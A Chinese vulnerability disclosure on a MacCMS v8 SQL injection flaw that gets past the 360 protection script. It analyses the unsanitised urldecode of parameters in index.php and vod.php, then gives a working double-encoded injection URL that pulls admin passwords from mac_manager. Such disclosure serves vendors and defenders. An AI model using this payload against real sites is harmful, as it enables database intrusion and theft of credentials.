苹果CMS绕过检测SQL注入，第四发（绕过360防护）

### 简要描述： 原来我之前说的那些都成废话了，厂商没有看懂，囧～，看回复把过错归结于360_safe3.php，不再发了，总结下原因。 ### 详细说明： index.php: ``` $m = be('get','m'); if(strpos($m,'.')){ $m = substr($m,0,strpos($m,'.')); } $par = explode('-',$m); $parlen = count($par); $ac = $par[0]; if(empty($ac)){ $ac='vod'; $method='index'; } $colnum = array("id","pg","yaer","typeid","classid"); if($parlen>=2){ $method = $par[1]; for($i=2;$i<$parlen;$i+=2){ $tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]); } } if($tpl->P['pg']<1){ $tpl->P['pg']=1; } unset($colnum); $acs = array('vod','art','map','user','gbook','comment','label'); if(in_array($ac,$acs)){ $tpl->P["module"] = $ac; include MAC_ROOT.'/inc/module/'.$ac.'.php'; } ``` 上面可以看到传递过来的参数$m经过be()转移看似很安全，-号分割数组后遇到神奇的$colnum,在$colnum中的变量intval处理，不在的呢？直接urldecode,我虽然没看明白为什么这样，当然最后得看这些变量会传递到哪里，所以这里难道仅仅是一个year写成yaer所造成的注入么，继续往下看，下面会包含inc/module/$ac.php 所以我们先看看vod.php: ``` elseif($method=='search') { $tpl->P["siteaid"] = 15; $wd = be("all", "wd"); if(!empty($wd)){ $tpl->P["wd"] = $wd; } //if(isN($tpl->P["wd"]) && isN($tpl->P["ids"]) && isN($tpl->P["pinyin"]) && isN($tpl->P["starring"]) && isN($tpl->P["directed"]) && isN($tpl->P["area"]) && isN($tpl->P["lang"]) && isN($tpl->P["year"]) && isN($tpl->P["letter"]) && isN($tpl->P["tag"]) && isN($tpl->P["type"]) && isN($tpl->P["typeid"]) && isN($tpl->P["classid"]) ){ alert ("搜索参数不正确"); } $tpl->P['cp'] = 'vodsearch'; $tpl->P['cn'] = urlencode($tpl->P['wd']).'-'.$tpl->P['pg'].'-'.$tpl->P['order'].'-'.$tpl->P['by'].'-'.$tpl->P['ids']. '-'.$tpl->P['pinyin']. '-'.$tpl->P['type']. '-'.$tpl->P['year']. '-'.$tpl->P['letter'].'-'.$tpl->P['typeid'].'-'.$tpl->P['classid'].'-'.urlencode($tpl->P['area']) .'-'.urlencode($tpl->P['lang']) .'-'.urlencode($tpl->P['tag']) .'-'.urlencode($tpl->P['starring']) .'-'.urlencode($tpl->P['directed']) ; echoPageCache($tpl->P['cp'],$tpl->P['cn']); if (!isN($tpl->P["year"])){ $tpl->P["key"]=$tpl->P["year"]; $tpl->P["des"] = $tpl->P["des"] ."&nbsp;上映年份为".$tpl->P["year"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_year=". $tpl->P["year"] ." "; } if (!isN($tpl->P["letter"])){ $tpl->P["key"]=$tpl->P["letter"]; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;首字母为" . $tpl->P["letter"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_letter='" . $tpl->P["letter"] ."' "; } if(!isN($tpl->P["area"])){ $tpl->P["key"]=$tpl->P["area"]; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;地区为" . $tpl->P["area"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_area='" . $tpl->P["area"] ."' "; } if (!isN($tpl->P["lang"])){ $tpl->P["key"]=$tpl->P["lang"]; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;语言为" . $tpl->P["lang"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_lang='" . $tpl->P["lang"] ."' "; } if (!isN($tpl->P["wd"])) { $tpl->P["key"]=$tpl->P["wd"] ; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;名称或主演为" . $tpl->P["wd"]; $tpl->P["where"] = $tpl->P["where"] . " AND ( instr(d_name,'".$tpl->P['wd']."')>0 or instr(d_starring,'".$tpl->P['wd']."')>0 ) "; } if (!isN($tpl->P["pinyin"])){ $tpl->P["key"]=$tpl->P["pinyin"] ; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;拼音为" . $tpl->P["pinyin"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_enname,'".$tpl->P['pinyin']."')>0 "; } if (!isN($tpl->P["starring"])){ $tpl->P["key"]=$tpl->P["starring"] ; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;主演为" . $tpl->P["starring"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_starring,'".$tpl->P['starring']."')>0 "; } if (!isN($tpl->P["directed"])){ $tpl->P["key"]=$tpl->P["directed"] ; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;导演为" . $tpl->P["directed"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_directed,'".$tpl->P['directed']."')>0 "; } if (!isN($tpl->P["tag"])){ $tpl->P["key"]=$tpl->P["tag"] ; $tpl->P["des"] = $tpl->P["des"] . "&nbsp;Tag为" . $tpl->P["tag"]; $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_tag,'".$tpl->P['tag']."')>0 "; } $tpl->P['typepid'] = 0; if(!isN($tpl->P["typeid"])){ $typearr = $MAC_CACHE['vodtype'][$tpl->P['typeid']]; if (is_array($typearr)){ $tpl->P['typepid'] = $typearr['t_pid']; if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"]; } $tpl->P["des"] = $tpl->P["des"] . "&nbsp;分类为" . $typearr["t_name"]; $tpl->P["where"] = $tpl->P["where"] . " AND d_type in (" . $typearr["childids"] . ") "; } unset($typearr); } if(!isN($tpl->P["classid"])){ $classarr = $MAC_CACHE['vodclass'][$tpl->P['classid']]; if (is_array($classarr)){ if (isN($tpl->P["key"])){ $tpl->P["key"]= $classarr["c_name"]; } $tpl->P["des"] = $tpl->P["des"] . "&nbsp;剧情分类为" . $classarr["c_name"]; $tpl->P["where"] = $tpl->P["where"] . ' AND instr(d_class,\','.$tpl->P['classid'].',\')>0 '; } unset($classarr); } $db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']); $tpl->H = loadFile(MAC_ROOT_TEMPLATE."/vod_search.html"); $tpl->mark(); $tpl->pageshow(); ``` 如果说第一发是因为year写错了导致不在$colnum中，避过了自身be()的处理和360防护脚本，那下面的其他参数呢，比如letter,area,where,des,lang,pinying,等等这些都没有经过其他过滤，所以直接urldecode了一次，所以可以注入的地方就很多了。当然不仅仅是这个页面，module下的其他页面也存在这个问题，就请厂商自行排查了。 ### 漏洞证明： 所以注入点很多，比如我们拿之前没有测试的letter来测试： ``` http://localhost/maccms8/index.php?m=vod-search-letter-luren%2527%2520and%25201%253D2%2520union%2520select%2520m_password%2520from%2520mac_manager%2520order%2520by%25201%2520desc%2523-des-2019-where-and%25201%253D1-siteid-luren ``` [<img src="https://images.seebug.org/upload/201406/26101907330db228503dfcea1a09bfc2346dde3e.png" alt="QQ20140626-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/26101907330db228503dfcea1a09bfc2346dde3e.png) ``` $colnum = array("id","pg","yaer","typeid","classid"); if($parlen>=2){ $method = $par[1]; for($i=2;$i<$parlen;$i+=2){ $tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]); } ``` 这才是罪魁祸首，由这处错误引起的其他注入不再发了。